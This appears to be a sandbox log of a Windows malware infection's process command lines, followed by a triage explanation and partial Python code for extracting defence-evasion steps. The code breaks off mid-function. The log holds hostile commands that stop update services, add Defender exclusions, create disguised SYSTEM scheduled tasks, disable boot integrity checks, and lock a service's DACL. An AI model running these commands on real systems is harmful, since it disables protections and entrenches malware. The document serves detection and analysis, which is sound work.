C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "15372562661215740005-12544478791981427685-219219477-8605077661879871049-943086376"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe\" 3Y /wKsite_idKbr 385119 /S" /V1 /F

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {7E2E3B45-7246-4668-9BC0-CAAE6C21C5B3} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe 3Y /wKsite_idKbr 385119 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gqXggzpuy" /SC once /ST 03:46:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gqXggzpuy"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gqXggzpuy"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\GxmxQlgq\lmAdWhykFjYNhohl.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\GxmxQlgq\lmAdWhykFjYNhohl.wsf"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 02:55:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\ZQkTMpd.exe\" KS /Qzsite_idPTZ 385119 /S" /V1 /F

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-770366011-11197729931568053727-1493761428634450725936144606-7768676012036437623"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\ZQkTMpd.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\ZQkTMpd.exe KS /Qzsite_idPTZ 385119 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\cbQZoF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
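The command lines above carry three defence-evasion steps that are worth extracting from process logs automatically: reg.exe writing Windows Defender exclusions under both the Group Policy key (HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions) and the local preference key (HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions), each in both the /reg:32 and /reg:64 views; schtasks registering a rundll32 task that runs as SYSTEM at logon; and sc sdset rewriting the DACL of a service named WinDefender so that Administrators (BA) are explicitly denied SERVICE_STOP and SERVICE_PAUSE_CONTINUE. The Python below is an added triage example, not part of the sandbox report and not the sample's code. It parses six command lines copied from this section (embedded as constructed input) and decodes the SDDL; the function names, the output layout and the "allow minus deny" simplification of ACE evaluation are the example's own choices.

```python
# Added triage example (not from the sandbox report or the sample): pull the Defender-exclusion,
# scheduled-task and service-DACL changes out of process command lines such as the ones above.
import json
import re

SAMPLE_CMDLINES = [  # constructed input: six command lines copied from the section above
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32',
    r'cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\cbQZoF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F',
    r'sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)',
]

# reg.exe ADD/DELETE on either Defender exclusion key: Group Policy (...\Policies\...) or local preference.
EXCLUSION_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+(?P<verb>ADD|DELETE)\s+'
    r'"(?P<key>HKLM\\SOFTWARE\\(?:Policies\\)?Microsoft\\Windows Defender\\Exclusions\\(?P<kind>\w+))"'
    r'.*?/v\s+"(?P<value>[^"]+)"', re.IGNORECASE)
VIEW_RE = re.compile(r'/reg:(?P<view>32|64)\b', re.IGNORECASE)
TASK_RE = re.compile(r'\bschtasks(?:\.exe)?\s+/CREATE\b.*?/TR\s+"(?P<action>(?:[^"\\]|\\.)*)"', re.IGNORECASE)
TASK_FIELDS = {"name": r'/TN\s+"([^"]+)"', "run_as": r'/RU\s+"?([^"\s]+)"?', "trigger": r'/SC\s+(\w+)'}
# sc sdset <service> <SDDL>; each ACE is (type;flags;rights;object_guid;inherit_guid;trustee).
SDSET_RE = re.compile(r'\bsc(?:\.exe)?\s+sdset\s+(?P<service>\S+)\s+(?P<sddl>\S+)', re.IGNORECASE)
ACE_RE = re.compile(r'\((?P<type>[A-Z]+);[A-Z]*;(?P<rights>[A-Z]*);[^;]*;[^;]*;(?P<sid>[^)]+)\)')
SERVICE_RIGHTS = {  # two-letter SDDL rights codes as they apply to service objects
    "CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS", "SW": "ENUMERATE_DEPENDENTS",
    "RP": "START", "WP": "STOP", "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER"}

def parse_defender_exclusions(cmdlines):
    """One record per reg.exe ADD/DELETE on a Defender Exclusions key, with scope and registry view."""
    found = []
    for line in cmdlines:
        m = EXCLUSION_RE.search(line)
        if not m:
            continue
        view = VIEW_RE.search(line)
        found.append({"verb": m["verb"].upper(),
                      "scope": "policy" if "\\Policies\\" in m["key"] else "local",
                      "kind": m["kind"],  # Paths, Extensions or Processes
                      "value": m["value"],
                      "view": view["view"] if view else "native"})
    return found

def parse_task_create(cmdline):
    """Decode a schtasks /CREATE line (the /TR action may carry \\" escaped quotes) into its fields."""
    m = TASK_RE.search(cmdline)
    if not m:
        return None
    task = {"action": m["action"].replace('\\"', '"')}  # undo the cmd-level quote escaping
    for field, pattern in TASK_FIELDS.items():
        f = re.search(pattern, cmdline, re.IGNORECASE)
        task[field] = f.group(1) if f else None
    return task

def decode_rights(rights):
    """Split an SDDL rights string into two-letter codes and name them."""
    return [SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)]

def parse_sdset(cmdline):
    """Decode the DACL of an 'sc sdset' command line into allow/deny ACEs per trustee."""
    m = SDSET_RE.search(cmdline)
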